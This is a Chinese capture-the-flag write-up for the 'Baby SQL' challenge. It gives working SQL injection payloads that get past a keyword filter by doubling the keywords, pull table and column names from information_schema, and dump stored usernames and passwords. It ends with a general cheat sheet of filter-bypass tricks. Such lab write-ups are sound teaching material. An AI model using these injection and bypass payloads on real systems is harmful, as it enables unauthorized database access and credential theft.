0x01 Subject
Baby SQL
=> 注入漏洞
0x02 Mind Palace
这里的提示是 => 做了严格的过滤 => 关键在绕过(maybe)
/check.php?username=xxx&password=xxx
select x,x from table where username = xxx and password = xxx
payload = /check.php?username=root%27+or+1%3D1%3B%23&password=root
但是感觉上是注释符被过滤了或者and or被过滤了
=> root%27+or+1%3D1%3B%23
| root' or 1=1;#
假设是or被过滤了,用url编码一下试试%6f%72
=> root%27+%6f%72+1%3D1%3B%23
| root' or 1=1;#
反馈:1=1;#' 附近有语法错误
那可能是;
or #
被过滤?
=> root%27/**/%6f%72/**/1%3D1%3B%23
=> root%27/**/oorr/**/1%3D1%3B%23
=> root%27%2520oorr%25201%3D1%3B%23
| root'%20oorr%201=1;#
反馈:Unknown column '20or' in 'where clause'
好像发现了什么不得了的东西 emm
过滤是肯定有过滤的 ;; oorr的绕过好像是没问题的
因为上面是在抓包的情况下改的 我们直接试试去登陆界面输入
root = root' oorr 1=1;#
[图片上传失败...(image-39c139-1611499391656)]
payload => /check.php?username=root%27+oorr+1%3D1%3B%23&password=root
成功绕过
查找column的数量
/check.php?username=admin' order by 3%23&password=1
反馈有error
推测by也是有过滤的用`bbyy代替
root = admin' oorrder bbyy 3#
=> Login Success
root = admin' oorrder bbyy 4#
=> Error
说明这个table里面有三列数据
下一步就是找到回显点
root = admin' union select 1,2,3
=> Error 有过滤需绕过
UnIon SeLEcT失败 => 继续拼字符串 => ununionion selselectect
root => 9' ununionion selselectect 1,2,3#
说明column2 + column3可以作为回显点
root => 9' ununionion selselectect 1,database(),version()#
=> database_name = geek
下一步:利用information_schema.tables
爆破有哪些table
root => 9' ununionion selselectect 999,999,group_concat(table_name) from information_schema.tables where table_schema=geek#
=> Error
from+where都有过滤?都去试试看看
from => frfromom;where => whwhereere
Information_schema变成了;;;哦哦哦 or 也是有过滤的emm
root = 9' ununionion selselectect 999,999,group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema=database()#
/check.php?username=9%27+ununionion+selselectect+999%2C999%2Cgroup_concat%28table_name%29+frfromom+infoorrmation_schema.tables+whwhereere+table_schema%3D'geek'%23&password=1
果断猜测flag存在于b4bsql
表中 => 爆破column_name
root = 9' ununionion selselectect 999,999,group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_schema=database() anandd table_name='b4bsql'#
(我麻了,and也需要绕一下(。ì _ í。))
再根据这个三个字段爆破数据
root = 9' ununionion selselectect 999,999,group_concat(id,username,passwoorrd) frfromom b4bsql#
(我麻了,有error多半是有什么地方没绕|不要忘记了(。ì _ í。))
获得flag
0x03 Look Ahead
小总结一下
- 根据提示知道sql注入有严格的过滤;再通过尝试找到绕过的方法为藏字符
- 直接获得username和password 但是没有有用的信息
- 通过order by的报错知晓有多少列:root =
admin' oorrder bbyy 4#
- 寻找回显点:root =>
9' ununionion selselectect 1,2,3#
- 获得数据库基本信息:root =>
9' ununionion selselectect 1,database(),version()#
- 通过information_schema数据库爆破table_name + column_names
- root =
9' ununionion selselectect 999,999,group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema=database()#
- root =
9' ununionion selselectect 999,999,group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_schema=database() anandd table_name='b4bsql'#
- root =
- 再根据知道的column_names去获取数据
- root =
9' ununionion selselectect 999,999,group_concat(id,username,passwoorrd) frfromom b4bsql#
- root =
关于绕过过滤の潜在的方法
IF 过滤空格和--+等注释符
多行注释符(块注释符)、一对英文括号、换行符、加号来代替空格
IF 特定字符被过滤
0x01 大小写变形
and => AnD
or => Or oR OR
0x02 改变编码
采用url编码;把ascii编码的0x给替换成%,比如o的ascii为0x6f
,url编码就是%6f
0x03 添加注释
select => sel/**/ect
and => a/**/nd
0x04 藏字符
select => selselectect
and => anandd
0x05 使用符号
and => &&
or => ||
IF 数字被过滤
0x01 数据类型改变
1 => 1.0
3 => 3.0
IF 关系符号被过滤
>
<
=> greatest() least()
=> where greatest(ascii(substr(database(),0,1)),64)=64
References:
https://blog.csdn.net/weixin_40950781/article/details/100061268
https://www.cnblogs.com/peterpan0707007/p/7501507.html
https://blog.csdn.net/qq_45521281/article/details/105533626
END(¯﹃¯)